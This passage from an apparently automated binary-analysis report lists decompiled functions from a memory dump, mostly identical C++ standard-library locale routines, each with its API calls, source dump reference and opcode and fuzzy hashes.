                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7456
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7460
                                                                                                                                  • int.LIBCPMT ref: 6E8F7477
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F74B1
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F74D1
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F74DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 69a908fb878165c8ffad0055af2bee8568e35e440cdc7bcd946674bd97c6edb6
                                                                                                                                  • Instruction ID: 2faab873dd4532f43786987a34caeb2c1b898982d612ab398ee881bbfa47b377
                                                                                                                                  • Opcode Fuzzy Hash: 69a908fb878165c8ffad0055af2bee8568e35e440cdc7bcd946674bd97c6edb6
                                                                                                                                  • Instruction Fuzzy Hash: 6E010031900629DBCF01DBE8C9546EE7B7ABF917A8F200C19E410BB2C0DF75994B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7C75, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7C7C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7C86
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C9D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7CD7
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7CF7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D04
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 681e0eba1d5ddadcbc0d80fecb081a90cc4f3dd7994a56ac0c0bf4d3fe245d21
                                                                                                                                  • Instruction ID: 3b750ac5f0521b78b7964e6faffb0a07d4eedf327a077002df17b1faa24f84c4
                                                                                                                                  • Opcode Fuzzy Hash: 681e0eba1d5ddadcbc0d80fecb081a90cc4f3dd7994a56ac0c0bf4d3fe245d21
                                                                                                                                  • Instruction Fuzzy Hash: BB01D671900616DBCF01DBE8C554AED7B796F85398F110D09D8106B2C0DF749A4BCB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E9055EC, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9055F3
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9055FD
                                                                                                                                  • int.LIBCPMT ref: 6E905614
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90564E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90566E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E90567B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1e91871c5d3a3bfdd581383a6af938c3a46e51f9c7985a221810848d4a84316c
                                                                                                                                  • Instruction ID: 5c9c982138a02d9ea60e3df29f58f4abac5ed075490652780e9742afde9798e3
                                                                                                                                  • Opcode Fuzzy Hash: 1e91871c5d3a3bfdd581383a6af938c3a46e51f9c7985a221810848d4a84316c
                                                                                                                                  • Instruction Fuzzy Hash: EC01C031900A19CBCB01DBE8C954AED777AAF95768F540D0DD410AB2D0DF74D9478B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7D0A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7D11
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7D1B
                                                                                                                                  • int.LIBCPMT ref: 6E8F7D32
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7D6C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7D8C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: bd63205533edd6f4b850c4a434120208f6764dd55c1d45360a12c5e0f0401939
                                                                                                                                  • Instruction ID: 754441454ffdcce11edbdf5973a80b12380b1481401f2f19d5bd2b6402722df7
                                                                                                                                  • Opcode Fuzzy Hash: bd63205533edd6f4b850c4a434120208f6764dd55c1d45360a12c5e0f0401939
                                                                                                                                  • Instruction Fuzzy Hash: 5D01AD7591061ADBDB02EBE8C8546FD7779AF85398F600E09D4116B2C0DB74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7579, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7580
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F758A
                                                                                                                                  • int.LIBCPMT ref: 6E8F75A1
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F75DB
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F75FB
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7608
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 2398042ed61fe7a42c04db38213ada4e534ae55af2cc044f9306c9529c3d5e02
                                                                                                                                  • Instruction ID: adac9e9d02c415bfa1da94608cddf526ebe83463a9d13019bb77094e22f0509e
                                                                                                                                  • Opcode Fuzzy Hash: 2398042ed61fe7a42c04db38213ada4e534ae55af2cc044f9306c9529c3d5e02
                                                                                                                                  • Instruction Fuzzy Hash: C701003190061ACBCF01DFE8C8446EDBB7AAF85399F104D19D4206B2C0DF74DA0B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7A21, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7A28
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7A32
                                                                                                                                  • int.LIBCPMT ref: 6E8F7A49
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7A83
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7AA3
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7AB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 5cae0b53ed271250d80a834b566ee1a0e8df5bcd9d994e3ea8ea69ce948a3b98
                                                                                                                                  • Instruction ID: f2cae7bac51491897d6804430f88878f2784499b1103424d8335ea1b7ea5f6c9
                                                                                                                                  • Opcode Fuzzy Hash: 5cae0b53ed271250d80a834b566ee1a0e8df5bcd9d994e3ea8ea69ce948a3b98
                                                                                                                                  • Instruction Fuzzy Hash: DF01C431900616DBDB01DBE8C8546EE7B79AF85394F110D09E4116B2C0DF749A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905398, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90539F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9053A9
                                                                                                                                  • int.LIBCPMT ref: 6E9053C0
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9053FA
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90541A
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905427
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: b61b374049b54f1ebf213b984e254982e0aeef67177dbee761b21b72765117ce
                                                                                                                                  • Instruction ID: 358e915231c67d732a471a774b7cf4508512ed95c458f85b2a1d668df016cf7e
                                                                                                                                  • Opcode Fuzzy Hash: b61b374049b54f1ebf213b984e254982e0aeef67177dbee761b21b72765117ce
                                                                                                                                  • Instruction Fuzzy Hash: DC01AD71904619DBCF11DBE8C854AED7779AF95368F604D0DD410AB280DB74DD46CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F73BA, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F73C1
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F73CB
                                                                                                                                  • int.LIBCPMT ref: 6E8F73E2
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F741C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F743C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7449
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1bf115f5b73969ad213d1fe5ed95a436d707bdc652bd1d07581d9e2c5786ba2c
                                                                                                                                  • Instruction ID: 782399bd0ad5c3cbcb3ad7450edbb73f958966701449313e0df90b736cd0c7d0
                                                                                                                                  • Opcode Fuzzy Hash: 1bf115f5b73969ad213d1fe5ed95a436d707bdc652bd1d07581d9e2c5786ba2c
                                                                                                                                  • Instruction Fuzzy Hash: 0C01C07190061ADBCF01DFE8C954AEE7B79AF95398F204D09D810AB2D0DF74DA4B9B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7BE0, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7BE7
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7BF1
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C08
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7C42
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7C62
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7C6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1cb5fb0dbf8ead3edb56e296bed3117c0eee1e8cfc3b3aa51e3c55015d883c04
                                                                                                                                  • Instruction ID: 1678171c9ebac73d6eabb11e4e256099e90fbaefa3b2f61e45b5820a44a64127
                                                                                                                                  • Opcode Fuzzy Hash: 1cb5fb0dbf8ead3edb56e296bed3117c0eee1e8cfc3b3aa51e3c55015d883c04
                                                                                                                                  • Instruction Fuzzy Hash: D301C031900619DBCF05DBE8C954AEE77BAAF95398F114D09D4106B2C0DF759E47CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1B6C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1B73
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1B7D
                                                                                                                                  • int.LIBCPMT ref: 6E8F1B94
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1BCE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1BEE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1BFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 2317695287f27033c4efe903a19ce9f969b291ddc9b16ce942c84c7c7a5a7ab9
                                                                                                                                  • Instruction ID: 5b4425c6f94c1c861d846ecb29d72aa664c5ec95751fbda5a97360da72f5604e
                                                                                                                                  • Opcode Fuzzy Hash: 2317695287f27033c4efe903a19ce9f969b291ddc9b16ce942c84c7c7a5a7ab9
                                                                                                                                  • Instruction Fuzzy Hash: 6D01C071900619DBCF01DBE8C994AEE7B79AF85398F114D09E4106B280EF749E4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F78F7, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F78FE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7908
                                                                                                                                  • int.LIBCPMT ref: 6E8F791F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7959
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7979
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7986
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 31cd22187ae5ba17f3532dbd5cd75dfbf4dffba04c08468e5fc32c709a7f099c
                                                                                                                                  • Instruction ID: ac8a07094d15551a8694c85ddc199398bb2cbecfc4aca8c91f7583edce66c46b
                                                                                                                                  • Opcode Fuzzy Hash: 31cd22187ae5ba17f3532dbd5cd75dfbf4dffba04c08468e5fc32c709a7f099c
                                                                                                                                  • Instruction Fuzzy Hash: BA01C071A0061ADBDF01DBE8C954AEDB7BAAF95398F104D09E4506B2C0DF74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7862, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7869
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7873
                                                                                                                                  • int.LIBCPMT ref: 6E8F788A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F78C4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F78E4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F78F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 3686bba3bee8e96078c8f6a104bd30e33814984ed11cfd446279ff405e9e3bcf
                                                                                                                                  • Instruction ID: 0d5058e70bcb0a559f184b9b828f7ac90169e727680afa8374d7518b43e8fbc5
                                                                                                                                  • Opcode Fuzzy Hash: 3686bba3bee8e96078c8f6a104bd30e33814984ed11cfd446279ff405e9e3bcf
                                                                                                                                  • Instruction Fuzzy Hash: 9501ED31A10619DBCF01DBE8C854AEDBB7AAF85798F100C08D8107B2C0DB749947CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F798C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7993
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F799D
                                                                                                                                  • int.LIBCPMT ref: 6E8F79B4
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F79EE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7A0E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7A1B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 7df6204f9d6c49063b2ccd8fbd09803162dc494f45baf35dab1c96057c6d67e5
                                                                                                                                  • Instruction ID: 8c10f35ad6274fd1dfaea977576a2d4c133fa56c925716ab5f3c05dd9e5b98fc
                                                                                                                                  • Opcode Fuzzy Hash: 7df6204f9d6c49063b2ccd8fbd09803162dc494f45baf35dab1c96057c6d67e5
                                                                                                                                  • Instruction Fuzzy Hash: EE010031900619CBCF01DBE8C954AEE7B79AF81398F114C09E8116B2C0DF749A07CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FE031, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2204710431-1686923651
                                                                                                                                  • Opcode ID: 9d4bcbeb06d206b8713bd4c3b54ca893d0ddde55cad070fc19330a0dd95971b4
                                                                                                                                  • Instruction ID: 5432ddae9369842a7e26f9663d4ef6ea3061af4ab918a544d97c6a3d04249322
                                                                                                                                  • Opcode Fuzzy Hash: 9d4bcbeb06d206b8713bd4c3b54ca893d0ddde55cad070fc19330a0dd95971b4
                                                                                                                                  • Instruction Fuzzy Hash: 72217FB1904A96AFDB21CFB8849076BBEECAF18254F044E1EE459C7A41E734D602CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92FF15, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$InformationTimeZone
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 597776487-0
                                                                                                                                  • Opcode ID: 2525265a8903948deb8fe8377bf5de155e90388b3dbb5dc1fea4b5f2201ae055
                                                                                                                                  • Instruction ID: 40db86d213b3e28abae1ab7155b046fa1296401fb8678ee60d0cc2525e22bb79
                                                                                                                                  • Opcode Fuzzy Hash: 2525265a8903948deb8fe8377bf5de155e90388b3dbb5dc1fea4b5f2201ae055
                                                                                                                                  • Instruction Fuzzy Hash: AEC126719142259FDB108FF88850BEE7BBEAF96358F344969D490AB285F731CA42CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E932B27, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                  • Opcode ID: 3a2a9ffbba49252ecc00564889112a80e9954c9ae6f56eb0d11fbc6cc8e3ddcb
                                                                                                                                  • Instruction ID: 82f023b999c3dbb32c2ab1f495dcb7a8f1f98f948c5c582d9c68e0e3c7da7879
                                                                                                                                  • Opcode Fuzzy Hash: 3a2a9ffbba49252ecc00564889112a80e9954c9ae6f56eb0d11fbc6cc8e3ddcb
                                                                                                                                  • Instruction Fuzzy Hash: C951E532A00715AFEB10DFAAC880AAA77F8FF59714F244969E815DB250E731D901CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FE244, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404127365-0
                                                                                                                                  • Opcode ID: 553052bb9a527c4a483356c8188f8bd8eb366442fb42275b7b9b83cdb0162acf
                                                                                                                                  • Instruction ID: 9d9f6c3f39ee678dd2dadd4c07138d11817211271ce1b65009b54289335904b0
                                                                                                                                  • Opcode Fuzzy Hash: 553052bb9a527c4a483356c8188f8bd8eb366442fb42275b7b9b83cdb0162acf
                                                                                                                                  • Instruction Fuzzy Hash: BE2125B1C00348EFDB14DFE5D8849DABBB8AF84714F00895AE9159F255EB70DA41CFA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F67FA, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$Maklocchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2020259771-0
                                                                                                                                  • Opcode ID: 2833313188859c668e58f4cf59359ed7e4d85d9231e0e25294733c2f7c2fcab2
                                                                                                                                  • Instruction ID: 877c5e5175563c59976a1fc4e5f63ef5d0250026fd5787aa7b6c7256552b63e9
                                                                                                                                  • Opcode Fuzzy Hash: 2833313188859c668e58f4cf59359ed7e4d85d9231e0e25294733c2f7c2fcab2
                                                                                                                                  • Instruction Fuzzy Hash: CB116DB1960745FFE6208BE99840B52B7ECAF04694F048E2AF2448B640D365F95197E4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93CEE5, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6E93CEFD
